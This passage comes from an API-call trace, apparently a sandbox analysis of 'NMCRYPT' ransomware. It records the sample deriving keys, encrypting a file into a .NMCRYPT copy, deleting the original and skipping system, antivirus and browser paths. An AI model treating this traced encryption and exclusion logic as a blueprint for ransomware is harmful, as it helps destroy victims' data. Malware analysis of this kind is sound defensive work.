hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.103] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.104] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0166.104] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0166.104] CryptCreateHash (in: hProv=0x8e3770, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444854 | out: phHash=0x1d444854) returned 1 [0166.104] CryptHashData (hHash=0x9ad338, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.104] CryptDeriveKey (in: hProv=0x8e3770, Algid=0x6610, hBaseData=0x9ad338, dwFlags=0x4, phKey=0x1d444858 | out: phKey=0x1d444858*=0x9ad5f8) returned 1 [0166.104] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0166.104] CryptSetKeyParam (hKey=0x9ad5f8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0166.104] wcslen (_String="\\\\?\\") returned 0x4 [0166.104] CryptDuplicateKey (in: hKey=0x9ad5f8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad738) returned 1 [0166.104] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.htm.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0166.105] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0166.105] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=230) returned 1 [0166.106] CryptEncrypt (in: hKey=0x9ad738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xe6, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0xf0) returned 1 [0166.106] GetLastError () returned 0x0 [0166.106] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0xf0, lpOverlapped=0x0) returned 1 [0166.263] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0166.263] WriteFile (in: hFile=0x15c4, lpBuffer=0x2895990*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0166.263] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm") returned 1 [0166.264] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.htm")) returned 0 [0166.264] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm" [0166.264] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0166.264] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFCF9.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfcf9.tmp")) returned 0xfcf9 [0166.264] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFCF9.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfcf9.tmp"), dwFlags=0x1) returned 0 [0166.265] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFCF9.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfcf9.tmp")) returned 1 [0166.265] CryptDestroyKey (hKey=0x9ad738) returned 1 [0166.265] wcslen (_String="OK") returned 0x2 [0166.265] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.265] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.265] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0166.265] CryptDestroyHash (hHash=0x9ad338) returned 1 [0166.265] CryptReleaseContext (hProv=0x8e3770, dwFlags=0x0) returned 1 [0166.265] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*NMCRYPT") returned 0 [0166.265] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*Recovers your files.html") returned 0 [0166.265] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*.exe") returned 0 [0166.265] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*.dll") returned 0 [0166.265] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*.lnk") returned 0 [0166.265] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*.bat") returned 0 [0166.265] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*.ini") returned 0 [0166.265] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*.msi") returned 0 [0166.265] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*.scf") returned 0 [0166.265] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*pagefile.sys*") returned 0 [0166.265] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*NTUSER.DAT*") returned 0 [0166.265] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*AppData*") returned 0 [0166.265] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*\\winrar\\*") returned 0 [0166.265] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*\\Internet Explorer\\*") returned 0 [0166.265] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*\\java\\*") returned 0 [0166.265] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*\\TeamViewer\\*") returned 0 [0166.265] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*\\windows\\*") returned 0 [0166.265] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*\\ESET\\*") returned 0 [0166.266] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*\\AVG\\*") returned 0 [0166.266] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*\\AVIRA\\*") returned 0 [0166.266] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*\\AVAST Software\\*") returned 0 [0166.266] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*Atheros*") returned 0 [0166.266] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*Realtek*") returned 0 [0166.266] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*bootmgr*") returned 0 [0166.266] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*boot*") returned 0 [0166.266] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*boot*") returned 0 [0166.266] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*CONFIG.SYS*") returned 0 [0166.266] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*IO.SYS*") returned 0 [0166.266] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*MSDOS.SYS*") returned 0 [0166.266] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*NTDETECT.COM*") returned 0 [0166.266] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*ntldr*") returned 0 [0166.266] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*chrome*") returned 0 [0166.266] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*opera*") returned 0 [0166.266] PathMatchSpecW (pszFile="Stars.jpg", pszSpec="*firefox*") returned 0 [0166.266] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg", pszSpec="*") returned 1 [0166.266] strlen (_Str="NMoreira") returned 0x8 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.266] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.267] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.268] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: 